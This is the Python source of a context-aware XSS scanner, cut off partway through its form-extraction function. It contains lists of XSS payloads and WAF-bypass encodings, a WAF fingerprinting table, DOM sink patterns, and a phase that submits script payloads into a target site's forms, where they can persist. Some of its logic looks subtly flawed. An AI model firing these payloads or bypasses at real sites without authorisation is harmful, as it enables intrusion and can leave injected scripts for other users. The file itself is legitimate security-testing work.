from __future__ import annotations
"""XSS Scanner — production-grade context-aware Cross-Site Scripting detection.

Features:
1. Context detection — parses HTML to identify injection contexts:
   - HTML body (between tags)
   - HTML attribute (inside src="", href="", etc.)
   - JavaScript (inside <script> tags)
   - URL (in href, src attributes)
   - CSS (in style attributes)
2. Context-aware payloads — generated per context
3. Reflection analysis — checks if payload appears UNMODIFIED
4. Filter detection — identifies which characters are filtered
5. WAF bypass — tries encoding variants when basic payloads blocked
6. DOM XSS detection — finds dangerous sinks in JS
7. Stored XSS — submits via forms, checks persistence

Every finding has evidence and confidence scoring.
"""

import re
import time
from dataclasses import dataclass, field
from enum import Enum
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import parse_qs, urlencode, urlparse, urlunparse

from .findings import Finding
from ..core.logger import logger
from ..core.ratelimit import get_limiter


# ---------------------------------------------------------------------------
# Injection context types
# ---------------------------------------------------------------------------

class InjectionContext(str, Enum):
    HTML_BODY = "html_body"
    HTML_ATTRIBUTE = "html_attribute"
    JAVASCRIPT = "javascript"
    URL = "url"
    CSS = "css"
    UNKNOWN = "unknown"


# ---------------------------------------------------------------------------
# Filter tracking
# ---------------------------------------------------------------------------

@dataclass
class FilterInfo:
    """Information about what characters/patterns are filtered."""
    filtered_chars: Set[str] = field(default_factory=set)
    filtered_patterns: List[str] = field(default_factory=list)
    encoding_applied: str = ""  # "html_entity", "url_encode", "js_escape", "none"
    case_sensitive: bool = True
    null_bytes_stripped: bool = False
    waf_detected: bool = False
    waf_name: str = ""


# ---------------------------------------------------------------------------
# WAF signatures (shared with sqli but XSS-specific patterns added)
# ---------------------------------------------------------------------------

XSS_WAF_SIGNATURES: Dict[str, List[str]] = {
    "Cloudflare": [
        r"cloudflare", r"cf-ray", r"Attention Required.*?Cloudflare",
        r"cf-chl-bypass", r"X-Blocked-Because",
    ],
    "Akamai": [
        r"akamai", r"akamaighost",
    ],
    "ModSecurity": [
        r"mod_security", r"modsecurity",
        r"This error was generated by Mod_Security",
    ],
    "AWS WAF": [
        r"aws.*?waf", r"awswaf", r"Request blocked by.*?AWS",
    ],
    "Imperva/Incapsula": [
        r"imperva", r"incapsula",
    ],
    "Sucuri": [
        r"Sucuri", r"X-Sucuri-ID",
    ],
    "Wordfence": [
        r"Wordfence", r"wordfence.*?blocked",
    ],
    "Generic WAF": [
        r"Request blocked", r"blocked by.*?security",
        r"Your request has been blocked", r"security violation",
    ],
}

# Characters that can break out of contexts
BREAKOUT_CHARS = ['<', '>', '"', "'", "(", ")", "{", "}", ";", ":", "/", "\\", "&", "#"]

# ---------------------------------------------------------------------------
# Context-aware payloads
# ---------------------------------------------------------------------------

# (payload, context, description, requires_no_filter)
HTML_PAYLOADS: List[Tuple[str, InjectionContext, str, List[str]]] = [
    # HTML body context — tag injection
    ("<script>alert(1)</script>", InjectionContext.HTML_BODY, "script tag", ["<", ">", "/"]),
    ("<img src=x onerror=alert(1)>", InjectionContext.HTML_BODY, "img onerror", ["<", ">"]),
    ("<svg onload=alert(1)>", InjectionContext.HTML_BODY, "svg onload", ["<", ">"]),
    ("<details open ontoggle=alert(1)>", InjectionContext.HTML_BODY, "details ontoggle", ["<", ">"]),
    ("<body onload=alert(1)>", InjectionContext.HTML_BODY, "body onload", ["<", ">"]),
    ("<video src=x onerror=alert(1)>", InjectionContext.HTML_BODY, "video onerror", ["<", ">"]),
    ("<audio src=x onerror=alert(1)>", InjectionContext.HTML_BODY, "audio onerror", ["<", ">"]),
    ("<input onfocus=alert(1) autofocus>", InjectionContext.HTML_BODY, "input autofocus", ["<", ">"]),
    ("<textarea onfocus=alert(1) autofocus>", InjectionContext.HTML_BODY, "textarea autofocus", ["<", ">"]),
    ("<marquee onstart=alert(1)>", InjectionContext.HTML_BODY, "marquee onstart", ["<", ">"]),
    ("<math><maction actiontype=statusline# xlink:href=javascript:alert(1)>click</maction></math>", InjectionContext.HTML_BODY, "math+maction", ["<", ">"]),
    ("<iframe src=javascript:alert(1)>", InjectionContext.HTML_BODY, "iframe javascript", ["<", ">", ":"]),
    ("<object data=javascript:alert(1)>", InjectionContext.HTML_BODY, "object data", ["<", ">", ":"]),
    ("<embed src=javascript:alert(1)>", InjectionContext.HTML_BODY, "embed src", ["<", ">", ":"]),
    ("<isindex type=image src=1 onerror=alert(1)>", InjectionContext.HTML_BODY, "isindex onerror", ["<", ">"]),
    ("<xss id=x tabindex=1 onfocus=alert(1)></xss>", InjectionContext.HTML_BODY, "custom tag onfocus", ["<", ">"]),

    # Attribute context — break out of attribute
    ('" onfocus=alert(1) autofocus="', InjectionContext.HTML_ATTRIBUTE, "double quote attr breakout", ['"']),
    ("' onfocus=alert(1) autofocus='", InjectionContext.HTML_ATTRIBUTE, "single quote attr breakout", ["'"]),
    ('" onmouseover=alert(1) "', InjectionContext.HTML_ATTRIBUTE, "onmouseover attr breakout", ['"']),
    ("' onmouseover=alert(1) '", InjectionContext.HTML_ATTRIBUTE, "single quote onmouseover", ["'"]),
    ('" onfocus=alert(1) tabindex="1"', InjectionContext.HTML_ATTRIBUTE, "tabindex attr breakout", ['"']),
    ("javascript:alert(1)", InjectionContext.URL, "javascript protocol", [":"]),
    ("data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==", InjectionContext.URL, "data URI", [":"]),
    ('" style="background:url(javascript:alert(1))"', InjectionContext.CSS, "CSS style injection", ['"', ":", "(", ")"]),

    # JavaScript context — break out of JS string
    ("'-alert(1)-'", InjectionContext.JAVASCRIPT, "JS single quote breakout", ["'"]),
    ('"-alert(1)-"', InjectionContext.JAVASCRIPT, "JS double quote breakout", ['"']),
    ("</script><script>alert(1)</script>", InjectionContext.JAVASCRIPT, "script close inject", ["<", ">", "/"]),
    ("\\'-alert(1)//", InjectionContext.JAVASCRIPT, "escaped quote breakout", ["\\"]),
    ("';alert(1);//", InjectionContext.JAVASCRIPT, "semicolon breakout", ["'", ";"]),
    ('"-alert(1);//', InjectionContext.JAVASCRIPT, "double quote semicolon", ['"', ";"]),
    ("\\x3cscript\\x3ealert(1)\\x3c/script\\x3e", InjectionContext.JAVASCRIPT, "hex encoded script", []),
    ("</script><img src=x onerror=alert(1)>", InjectionContext.JAVASCRIPT, "script close + img", ["<", ">", "/"]),
]

# WAF bypass payloads — encoding variations
WAF_BYPASS_PAYLOADS: List[Tuple[str, InjectionContext, str]] = [
    # HTML entity encoding
    ("<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>",
     InjectionContext.HTML_BODY, "HTML entity encoding"),
    # Mixed case
    ("<ScRiPt>alert(1)</ScRiPt>", InjectionContext.HTML_BODY, "mixed case script"),
    ("<IMG SRC=x OnErRoR=alert(1)>", InjectionContext.HTML_BODY, "mixed case onerror"),
    # Tag mutation
    ("<img \"\"\"><script>alert(1)</script>\">", InjectionContext.HTML_BODY, "tag mutation"),
    ("<img src=x onerror=alert(1)//", InjectionContext.HTML_BODY, "trailing slash"),
    # Whitespace bypass
    ("<img\tsrc=x\nonerror=alert(1)>", InjectionContext.HTML_BODY, "tab/newline bypass"),
    ("<svg\t\nonload=alert(1)>", InjectionContext.HTML_BODY, "SVG whitespace"),
    # Protocol encoding
    ("<a href=\"&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert(1)\">click</a>",
     InjectionContext.URL, "HTML entity protocol"),
    # Template literal
    ("${alert(1)}", InjectionContext.JAVASCRIPT, "template literal injection"),
    # Base64 eval
    ("<img src=x onerror=eval(atob('YWxlcnQoMSk='))>", InjectionContext.HTML_BODY, "base64 eval"),
    # SVG variants
    ("<svg/onload=alert(1)>", InjectionContext.HTML_BODY, "SVG no-space"),
    ("<svg><animate onbegin=alert(1) attributeName=x dur=1s>", InjectionContext.HTML_BODY, "SVG animate"),
    ("<svg><set onbegin=alert(1) attributename=x to=1>", InjectionContext.HTML_BODY, "SVG set"),
    # Double encoding
    ("%253Cscript%253Ealert(1)%253C/script%253E", InjectionContext.HTML_BODY, "double URL encoding"),
    # Null byte
    ("<scr\x00ipt>alert(1)</script>", InjectionContext.HTML_BODY, "null byte injection"),
    # UTF-7 (if charset not set)
    ("+ADw-script+AD4-alert(1)+ADw-/script+AD4-", InjectionContext.HTML_BODY, "UTF-7 encoding"),
    # Backtick (template literals in event handlers)
    ("<img src=x onerror=alert`1`>", InjectionContext.HTML_BODY, "backtick alert"),
    # Newline in attribute
    ("<img src=x onerror=alert\x0a(1)>", InjectionContext.HTML_BODY, "newline in onerror"),
    # SVG foreignObject
    ("<svg><foreignObject><body xmlns=\"http://www.w3.org/1999/xhtml\"><script>alert(1)</script></body></foreignObject></svg>",
     InjectionContext.HTML_BODY, "SVG foreignObject"),
]


# ---------------------------------------------------------------------------
# DOM XSS dangerous sources and sinks
# ---------------------------------------------------------------------------

DOM_SOURCES = [
    r"document\.URL",
    r"document\.documentURI",
    r"document\.referrer",
    r"document\.baseURI",
    r"location(?:\.href)?",
    r"location\.search",
    r"location\.hash",
    r"location\.pathname",
    r"window\.name",
    r"document\.cookie",
    r"postMessage",
    r"localStorage",
    r"sessionStorage",
    r"\.value\b",  # form input values
]

DOM_SINKS = [
    r"document\.write\s*\(",
    r"document\.writeln\s*\(",
    r"\.innerHTML\s*=",
    r"\.outerHTML\s*=",
    r"\.insertAdjacentHTML\s*\(",
    r"eval\s*\(",
    r"setTimeout\s*\(\s*['\"]",
    r"setInterval\s*\(\s*['\"]",
    r"Function\s*\(",
    r"\.src\s*=",
    r"\.href\s*=",
    r"\.action\s*=",
    r"window\.open\s*\(",
    r"\.setAttribute\s*\(\s*['\"](?:src|href|action|data|code)",
    r"\.createContextualFragment\s*\(",
    r"Range\.createContextualFragment\s*\(",
    r"\.execScript\s*\(",
    r"msSetImmediate\s*\(",
    r"element\.src\b",
]

# Sink regex compiled
_RE_SOURCES = re.compile("|".join(DOM_SOURCES), re.I)
_RE_SINKS = re.compile("|".join(DOM_SINKS), re.I)


# ---------------------------------------------------------------------------
# Main XSS Scanner
# ---------------------------------------------------------------------------

class XSSScanner:
    """Production-grade XSS scanner with context-aware detection.

    Features:
    - Context detection (HTML, attribute, JS, URL, CSS)
    - Context-aware payload generation
    - Reflection analysis (unmodified reflection check)
    - Filter detection (which chars are filtered)
    - WAF bypass attempts
    - DOM XSS detection (source→sink analysis)
    - Stored XSS testing via form submission
    """

    NAME = "xss"

    def __init__(self, rps: float = 5.0, timeout: float = 10.0):
        self.limiter = get_limiter(rps)
        self.timeout = timeout

    # ------------------------------------------------------------------
    # Public API
    # ------------------------------------------------------------------

    def scan_url(self, url: str, params: Optional[dict] = None) -> List[Finding]:
        """Scan a URL for XSS vulnerabilities.

        Args:
            url: Target URL.
            params: Optional dict of parameter names to test values.
                    If None, extracted from URL query string.

        Returns:
            List of Finding objects with evidence.
        """
        try:
            import httpx
        except ImportError:
            logger.warning("httpx not installed — XSS scanner disabled")
            return []

        findings: List[Finding] = []
        parsed = urlparse(url)
        host = parsed.netloc

        # Resolve parameters
        if params:
            test_params = dict(params)
        else:
            test_params = {k: v[0] for k, v in parse_qs(parsed.query).items()}

        if not test_params:
            test_params = {"q": "test"}

        client = httpx.Client(
            follow_redirects=True,
            timeout=self.timeout,
            verify=False,
            headers={
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            },
        )

        try:
            # Get baseline
            self.limiter.wait(host)
            try:
                baseline = client.get(url)
                baseline_body = baseline.text
            except Exception:
                return findings

            # --- Phase 1: DOM XSS detection (static analysis) ---
            dom_findings = self._detect_dom_xss(client, url, host, baseline_body)
            findings.extend(dom_findings)

            # --- Phase 2: Context detection ---
            contexts = self._detect_contexts(baseline_body, test_params)

            # --- Phase 3: Reflected XSS per parameter ---
            for param_name in test_params:
                param_findings = self._test_parameter(
                    client, url, param_name, test_params,
                    baseline_body, host, contexts.get(param_name, InjectionContext.UNKNOWN)
                )
                findings.extend(param_findings)

            # --- Phase 4: Stored XSS via forms ---
            forms = self._extract_forms(baseline_body, url)
            if forms:
                stored_findings = self._test_stored_xss(client, url, forms, host)
                findings.extend(stored_findings)

        finally:
            client.close()

        return findings

    # ------------------------------------------------------------------
    # Context detection
    # ------------------------------------------------------------------

    def _detect_contexts(self, html: str, params: dict) -> Dict[str, InjectionContext]:
        """Detect where parameter values are reflected in the HTML.

        Returns a dict mapping parameter names to their injection context.
        """
        contexts: Dict[str, InjectionContext] = {}

        for param_name, param_value in params.items():
            if not param_value:
                continue

            # Find all occurrences of the parameter value in the HTML
            idx = 0
            detected_ctx = InjectionContext.UNKNOWN

            while True:
                idx = html.find(param_value, idx)
                if idx == -1:
                    break

                ctx = self._classify_context(html, idx, param_value)
                if ctx != InjectionContext.UNKNOWN:
                    detected_ctx = ctx
                    break

                idx += len(param_value)

            contexts[param_name] = detected_ctx

        return contexts

    def _classify_context(self, html: str, pos: int, value: str) -> InjectionContext:
        """Classify the injection context at a given position in HTML."""
        before = html[max(0, pos - 500):pos]
        after = html[pos:pos + 500]

        # Check if inside a <script> tag
        last_script_open = before.rfind("<script")
        last_script_close = before.rfind("</script>")
        if last_script_open > last_script_close and last_script_open != -1:
            return InjectionContext.JAVASCRIPT

        # Check if inside an attribute
        # Look for pattern: attribute="...value..." or attribute='...value...'
        attr_pattern = re.search(
            r'(\w+)\s*=\s*(["\'])([^"\']{0,100})$',
            before
        )
        if attr_pattern:
            attr_name = attr_pattern.group(1).lower()
            quote_char = attr_pattern.group(2)

            # Check if it's a URL attribute
            if attr_name in ("href", "src", "action", "formaction", "data", "code", "poster", "background"):
                return InjectionContext.URL

            # Check if it's a style attribute
            if attr_name == "style":
                return InjectionContext.CSS

            return InjectionContext.HTML_ATTRIBUTE

        # Check if in a style attribute by looking at surrounding tags
        if re.search(r'<[^>]+style\s*=\s*["\'][^"\']{0,100}$', before):
            return InjectionContext.CSS

        # Default: HTML body context
        return InjectionContext.HTML_BODY

    # ------------------------------------------------------------------
    # Per-parameter testing
    # ------------------------------------------------------------------

    def _test_parameter(
        self, client: "httpx.Client", url: str, param_name: str,
        base_params: dict, baseline_body: str, host: str,
        detected_context: InjectionContext
    ) -> List[Finding]:
        """Test a single parameter for XSS vulnerabilities."""
        findings: List[Finding] = []

        # --- Step 1: Filter detection ---
        filter_info = self._detect_filters(client, url, param_name, base_params, host)

        # --- Step 2: Generate context-appropriate payloads ---
        all_payloads = self._generate_payloads(detected_context, filter_info)

        # --- Step 3: Test each payload ---
        for payload, context, desc in all_payloads:
            test_params = dict(base_params)
            test_params[param_name] = payload
            test_url = urlunparse(urlparse(url)._replace(query=urlencode(test_params)))

            self.limiter.wait(host)
            try:
                resp = client.get(test_url)
                body = resp.text
            except Exception:
                continue

            # --- Step 4: Reflection analysis ---
            reflection = self._analyze_reflection(body, payload)
            if not reflection.reflected:
                continue

            # --- Step 5: Check if in executable context ---
            if not self._is_executable_context(body, payload, context, reflection.position):
                continue

            # --- Step 6: Canary verification (rule out cached/static content) ---
            canary = payload.replace("alert(1)", f"alert{int(time.time())}")
            test_params[param_name] = canary
            canary_url = urlunparse(urlparse(url)._replace(query=urlencode(test_params)))

            self.limiter.wait(host)
            try:
                canary_resp = client.get(canary_url)
                if canary not in canary_resp.text:
                    continue  # Not actually reflected
            except Exception:
                continue

            # --- Step 7: Build finding ---
            confidence = self._calculate_confidence(reflection, context, filter_info)
            severity = "HIGH" if confidence == "HIGH" else "MEDIUM"

            findings.append(Finding(
                vuln_type="Cross-Site Scripting (XSS)",
                title=f"Reflected XSS in parameter '{param_name}' ({context.value} context)",
                severity=severity,
                url=url,
                parameter=param_name,
                method="GET",
                payload=payload,
                evidence=(
                    f"Payload reflected {reflection.reflection_type} in {context.value} context. "
                    f"Position: char {reflection.position} | "
                    f"Surrounding: ...{reflection.surrounding}... | "
                    f"Filters active: {filter_info.filtered_chars or 'none'} | "
                    f"WAF: {filter_info.waf_name or 'none'}"
                ),
                description=(
                    f"Reflected XSS via {desc}. "
                    f"Payload appears {reflection.reflection_type} in the response "
                    f"within a {context.value} context, making it executable. "
                    + (f"WAF ({filter_info.waf_name}) detected but bypassed." if filter_info.waf_detected else "")
                ),
                remediation=(
                    "Implement context-aware output encoding: "
                    "HTML entity encoding for HTML body, "
                    "JavaScript string escaping for JS context, "
                    "URL encoding for URL context, "
                    "CSS escaping for style context. "
                    "Add Content-Security-Policy header. "
                    "Use a templating engine with auto-escaping."
                ),
                cvss=6.1,
                cwe="CWE-79",
                tool=self.NAME,
                verified=True,
                confidence=confidence,
                request=f"GET {test_url} HTTP/1.1",
                response_snippet=body[max(0, reflection.position - 100):reflection.position + len(payload) + 100],
            ))

            if any(f.confidence == "HIGH" for f in findings):
                return findings  # One high-confidence finding per param is enough

        return findings

    # ------------------------------------------------------------------
    # Filter detection
    # ------------------------------------------------------------------

    def _detect_filters(
        self, client: "httpx.Client", url: str, param: str,
        base_params: dict, host: str
    ) -> FilterInfo:
        """Detect what characters and patterns are filtered/blocked."""
        info = FilterInfo()

        # Test characters one by one
        test_chars = {
            '<': '&lt;',
            '>': '&gt;',
            '"': '&quot;',
            "'": '&#x27;',
            '&': '&amp;',
            '/': '&#x2F;',
            '(': '&#40;',
            ')': '&#41;',
            ';': '',
            ':': '',
            '\\': '',
            '#': '',
        }

        for char, encoded_form in test_chars.items():
            test_val = f"PREFIX{char}SUFFIX"
            test_params = dict(base_params)
            test_params[param] = test_val
            test_url = urlunparse(urlparse(url)._replace(query=urlencode(test_params)))

            self.limiter.wait(host)
            try:
                resp = client.get(test_url)
                body = resp.text

                # Check if character is reflected
                if test_val in body:
                    # Not filtered at all
                    continue
                elif encoded_form and encoded_form in body:
                    # HTML entity encoded
                    info.filtered_chars.add(char)
                    info.encoding_applied = "html_entity"
                elif test_val.replace(char, "") in body:
                    # Stripped
                    info.filtered_chars.add(char)
                else:
                    # Completely blocked or WAF
                    info.filtered_chars.add(char)
            except Exception:
                continue

        # Test for WAF
        waf_payload = '<script>alert(1)</script>'
        test_params = dict(base_params)
        test_params[param] = waf_payload
        test_url = urlunparse(urlparse(url)._replace(query=urlencode(test_params)))

        self.limiter.wait(host)
        try:
            resp = client.get(test_url)
            body = resp.text.lower()
            headers_str = " ".join(f"{k}: {v}" for k, v in resp.headers.items()).lower()
            combined = body + " " + headers_str

            for waf_name, patterns in XSS_WAF_SIGNATURES.items():
                for pattern in patterns:
                    if re.search(pattern, combined, re.I):
                        info.waf_detected = True
                        info.waf_name = waf_name
                        break
                if info.waf_detected:
                    break
        except Exception:
            pass

        return info

    # ------------------------------------------------------------------
    # Payload generation
    # ------------------------------------------------------------------

    def _generate_payloads(
        self, context: InjectionContext, filter_info: FilterInfo
    ) -> List[Tuple[str, InjectionContext, str]]:
        """Generate payloads appropriate for the context, avoiding filtered chars."""
        payloads: List[Tuple[str, InjectionContext, str]] = []

        # Add context-appropriate payloads
        for payload, ctx, desc, required_chars in HTML_PAYLOADS:
            # Check if this payload can work given the filters
            blocked = any(c in filter_info.filtered_chars for c in required_chars)
            if not blocked:
                payloads.append((payload, ctx, desc))

        # Add WAF bypass payloads if WAF detected or basic payloads might be filtered
        if filter_info.waf_detected or len(filter_info.filtered_chars) > 2:
            for payload, ctx, desc in WAF_BYPASS_PAYLOADS:
                payloads.append((payload, ctx, f"WAF bypass: {desc}"))

        # If no payloads available, try encoding variations of basic ones
        if not payloads:
            basic = "<script>alert(1)</script>"
            payloads.extend([
                (self._html_entity_encode(basic), InjectionContext.HTML_BODY, "HTML entity encoded"),
                (self._url_encode(basic), InjectionContext.HTML_BODY, "URL encoded"),
                (self._double_url_encode(basic), InjectionContext.HTML_BODY, "Double URL encoded"),
                (basic.upper(), InjectionContext.HTML_BODY, "Uppercase"),
            ])

        return payloads

    # ------------------------------------------------------------------
    # Reflection analysis
    # ------------------------------------------------------------------

    @dataclass
    class ReflectionResult:
        """Result of reflection analysis."""
        reflected: bool = False
        position: int = -1
        reflection_type: str = ""  # "unmodified", "partial", "encoded"
        surrounding: str = ""
        encoding_detected: str = ""

    def _analyze_reflection(self, body: str, payload: str) -> "XSSScanner.ReflectionResult":
        """Analyze how a payload is reflected in the response."""
        result = self.ReflectionResult()

        # Check for unmodified reflection
        idx = body.find(payload)
        if idx != -1:
            result.reflected = True
            result.position = idx
            result.reflection_type = "unmodified"
            result.surrounding = body[max(0, idx - 50):idx + len(payload) + 50]
            return result

        # Check for partial reflection (payload split across response)
        # This happens when some characters are stripped
        stripped = payload.replace("<", "").replace(">", "").replace('"', "").replace("'", "")
        if len(stripped) > 5:
            idx = body.find(stripped)
            if idx != -1:
                result.reflected = True
                result.position = idx
                result.reflection_type = "partial (stripped chars)"
                result.surrounding = body[max(0, idx - 50):idx + len(stripped) + 50]
                return result

        # Check for HTML entity encoded reflection
        encoded = self._html_entity_encode(payload)
        idx = body.find(encoded)
        if idx != -1:
            result.reflected = True
            result.position = idx
            result.reflection_type = "html_entity_encoded"
            result.encoding_detected = "html_entity"
            result.surrounding = body[max(0, idx - 50):idx + len(encoded) + 50]
            return result

        # Check for URL encoded reflection
        url_encoded = self._url_encode(payload)
        idx = body.find(url_encoded)
        if idx != -1:
            result.reflected = True
            result.position = idx
            result.reflection_type = "url_encoded"
            result.encoding_detected = "url"
            result.surrounding = body[max(0, idx - 50):idx + len(url_encoded) + 50]
            return result

        return result

    # ------------------------------------------------------------------
    # Executable context check
    # ------------------------------------------------------------------

    def _is_executable_context(
        self, body: str, payload: str, context: InjectionContext, position: int
    ) -> bool:
        """Check if the reflected payload is in an executable context."""
        if position == -1:
            position = body.find(payload)
        if position == -1:
            return False

        before = body[max(0, position - 200):position]
        after = body[position:position + len(payload) + 200]
        surrounding = before + after

        # Not executable if inside HTML comment
        if "<!--" in before and "-->" not in before:
            # Check we're actually inside the comment
            comment_start = before.rfind("<!--")
            comment_end = before.rfind("-->")
            if comment_start > comment_end:
                return False

        # Not executable if inside <textarea> or <title>
        for tag in ["textarea", "title", "noscript", "noframes", "xmp", "listing", "plaintext"]:
            tag_open = before.rfind(f"<{tag}")
            tag_close = before.rfind(f"</{tag}")
            if tag_open > tag_close and tag_open != -1:
                return False

        # Not executable if inside a <script> block but payload is HTML (mismatched context)
        if context in (InjectionContext.HTML_BODY, InjectionContext.HTML_ATTRIBUTE):
            last_script_open = before.rfind("<script")
            last_script_close = before.rfind("</script>")
            if last_script_open > last_script_close and last_script_open != -1:
                # Inside script tag — HTML tag injection won't work here
                return False

        # Context-specific checks
        if context == InjectionContext.JAVASCRIPT:
            # Must be inside a <script> tag
            last_script_open = before.rfind("<script")
            last_script_close = before.rfind("</script>")
            return last_script_open > last_script_close

        if context == InjectionContext.HTML_ATTRIBUTE:
            # Must be inside an attribute value
            return bool(re.search(r'=\s*["\'][^"\']{0,50}$', before))

        if context == InjectionContext.CSS:
            # Must be inside a style attribute
            return "style=" in before[-200:]

        if context == InjectionContext.URL:
            # Must be in href/src/action
            return bool(re.search(r'(?:href|src|action|formaction)\s*=\s*["\']?[^"\']{0,50}$', before))

        # HTML_BODY — just needs to not be in a non-executable container
        return True

    # ------------------------------------------------------------------
    # Confidence calculation
    # ------------------------------------------------------------------

    def _calculate_confidence(
        self, reflection: "XSSScanner.ReflectionResult",
        context: InjectionContext,
        filter_info: FilterInfo
    ) -> str:
        """Calculate confidence level for a finding."""
        score = 0

        # Unmodified reflection is strongest signal
        if reflection.reflection_type == "unmodified":
            score += 40
        elif reflection.reflection_type.startswith("partial"):
            score += 20

        # Context matters
        if context in (InjectionContext.HTML_BODY, InjectionContext.JAVASCRIPT):
            score += 30  # Most exploitable
        elif context == InjectionContext.HTML_ATTRIBUTE:
            score += 25
        elif context == InjectionContext.URL:
            score += 20
        elif context == InjectionContext.CSS:
            score += 15

        # Fewer filters = higher confidence
        if len(filter_info.filtered_chars) == 0:
            score += 30
        elif len(filter_info.filtered_chars) <= 2:
            score += 20
        elif len(filter_info.filtered_chars) <= 4:
            score += 10

        # WAF detected but bypassed = still high confidence
        if filter_info.waf_detected:
            score -= 10

        if score >= 70:
            return "HIGH"
        elif score >= 40:
            return "MEDIUM"
        else:
            return "LOW"

    # ------------------------------------------------------------------
    # DOM XSS detection
    # ------------------------------------------------------------------

    def _detect_dom_xss(
        self, client: "httpx.Client", url: str, host: str, html: str
    ) -> List[Finding]:
        """Detect potential DOM-based XSS by analyzing JavaScript for source→sink flows."""
        findings: List[Finding] = []

        # Extract all JavaScript from the page
        js_blocks: List[str] = []

        # Inline scripts
        for match in re.finditer(r'<script[^>]*>(.*?)</script>', html, re.DOTALL | re.I):
            js_blocks.append(match.group(1))

        # Also check for event handlers with JS
        for match in re.finditer(r'on\w+\s*=\s*["\']([^"\']+)["\']', html, re.I):
            js_blocks.append(match.group(1))

        for js_block in js_blocks:
            # Find sources
            source_matches = list(_RE_SOURCES.finditer(js_block))
            # Find sinks
            sink_matches = list(_RE_SINKS.finditer(js_block))

            if not source_matches or not sink_matches:
                continue

            # Check for source→sink flow (source appears before sink in same block)
            for source_match in source_matches:
                for sink_match in sink_matches:
                    # Source must come before sink (or very close)
                    if source_match.start() < sink_match.start():
                        # Check if there's a variable assignment chain
                        between = js_block[source_match.start():sink_match.start()]
                        if len(between) < 500:  # Close enough to be a flow
                            findings.append(Finding(
                                vuln_type="DOM-based XSS",
                                title=f"Potential DOM XSS: {source_match.group()} → {sink_match.group()}",
                                severity="MEDIUM",
                                url=url,
                                parameter="N/A (client-side)",
                                method="N/A",
                                payload="N/A (requires browser)",
                                evidence=(
                                    f"Source: {source_match.group()} at pos {source_match.start()} | "
                                    f"Sink: {sink_match.group()} at pos {sink_match.start()} | "
                                    f"Distance: {len(between)} chars"
                                ),
                                description=(
                                    f"DOM-based XSS potential. Source '{source_match.group()}' "
                                    f"flows into sink '{sink_match.group()}'. "
                                    f"An attacker may be able to control the source via URL fragment, "
                                    f"query parameter, or postMessage."
                                ),
                                remediation=(
                                    "Avoid using dangerous sinks (innerHTML, document.write, eval). "
                                    "Use textContent instead of innerHTML. "
                                    "Sanitize data from DOM sources before passing to sinks. "
                                    "Use a DOM purification library like DOMPurify."
                                ),
                                cvss=6.1,
                                cwe="CWE-79",
                                tool=self.NAME,
                                verified=False,
                                confidence="MEDIUM",
                                request=f"Static analysis of {url}",
                            ))

        return findings

    # ------------------------------------------------------------------
    # Stored XSS testing
    # ------------------------------------------------------------------

    def _test_stored_xss(
        self, client: "httpx.Client", url: str,
        forms: List[dict], host: str
    ) -> List[Finding]:
        """Test for stored XSS by submitting payloads via forms."""
        findings: List[Finding] = []

        marker = f"XSS{int(time.time())}"

        for form in forms[:3]:  # Limit to 3 forms
            action = form.get("action", url)
            method = form.get("method", "GET").upper()
            inputs = form.get("inputs", [])

            if not inputs:
                continue

            # Build form data with XSS marker
            form_data = {}
            for inp in inputs:
                name = inp.get("name", "")
                if not name:
                    continue
                value = inp.get("value", "")
                inp_type = inp.get("type", "text").lower()

                # Only inject text-like fields
                if inp_type in ("text", "search", "url", "email", "hidden", ""):
                    form_data[name] = f'<script>alert({marker})</script>'
                else:
                    form_data[name] = value or "test"

            if not form_data:
                continue

            # Submit form
            self.limiter.wait(host)
            try:
                if method == "POST":
                    resp = client.post(action, data=form_data)
                else:
                    resp = client.get(action, params=form_data)
            except Exception:
                continue

            # Check if marker appears in the response (immediate stored XSS)
            if f"alert({marker})" in resp.text or f"alert({marker})" in resp.text:
                findings.append(Finding(
                    vuln_type="Cross-Site Scripting (Stored)",
                    title=f"Stored XSS via form at {action}",
                    severity="CRITICAL",
                    url=action,
                    parameter=", ".join(form_data.keys()),
                    method=method,
                    payload=f'<script>alert({marker})</script>',
                    evidence=(
                        f"XSS payload with marker '{marker}' was stored and reflected "
                        f"immediately in the response after form submission."
                    ),
                    description=(
                        "Stored XSS vulnerability. User input is stored and rendered "
                        "without sanitization. This affects all users who view the page."
                    ),
                    remediation=(
                        "Sanitize all stored user input before rendering. "
                        "Use context-aware output encoding. "
                        "Implement Content-Security-Policy with nonce-based script loading."
                    ),
                    cvss=9.6,
                    cwe="CWE-79",
                    tool=self.NAME,
                    verified=True,
                    confidence="HIGH",
                    request=f"{method} {action} with {len(form_data)} fields",
                    response_snippet=resp.text[:2000],
                ))

            # Also check on subsequent page load
            self.limiter.wait(host)
            try:
                check_resp = client.get(url)
                if f"alert({marker})" in check_resp.text:
                    findings.append(Finding(
                        vuln_type="Cross-Site Scripting (Stored)",
                        title=f"Stored XSS persists on {url}",
                        severity="CRITICAL",
                        url=url,
                        parameter=", ".join(form_data.keys()),
                        method=method,
                        payload=f'<script>alert({marker})</script>',
                        evidence=(
                            f"XSS payload with marker '{marker}' persisted across page loads. "
                            f"Submitted via {method} to {action}, found on GET {url}."
                        ),
                        description=(
                            "Stored XSS confirmed. Payload survives across page loads, "
                            "meaning all visitors to this page are affected."
                        ),
                        remediation=(
                            "Sanitize all stored user input before rendering. "
                            "Implement CSP headers. Use auto-escaping template engine."
                        ),
                        cvss=9.6,
                        cwe="CWE-79",
                        tool=self.NAME,
                        verified=True,
                        confidence="HIGH",
                    ))
            except Exception:
                continue

        return findings

    # ------------------------------------------------------------------
    # Form extraction (lightweight)
    # ------------------------------------------------------------------

    def _extract_forms(self, html: str, page_url: str) -> List[dict]:
        """Extract forms from HTML."""
        forms = []
        form_pattern = re.compile(r'<form[^>]*>(.*?)</form>', re.I | re.DOTALL)

        for form_match in form_pattern.finditer(html):
            form_html = form_match.group(0)

            action_match = re.search(r'action=["\']([^"\']*)["\']', form_html, re.I)
            action = action_match.group(1) if action_match else page_url

            method_match = re.search(r'method=["\']([^"\']*)["\']', form_html, re.I)
            method = (method_match.group(1) if method_match else "GET").upper()

            inputs = []
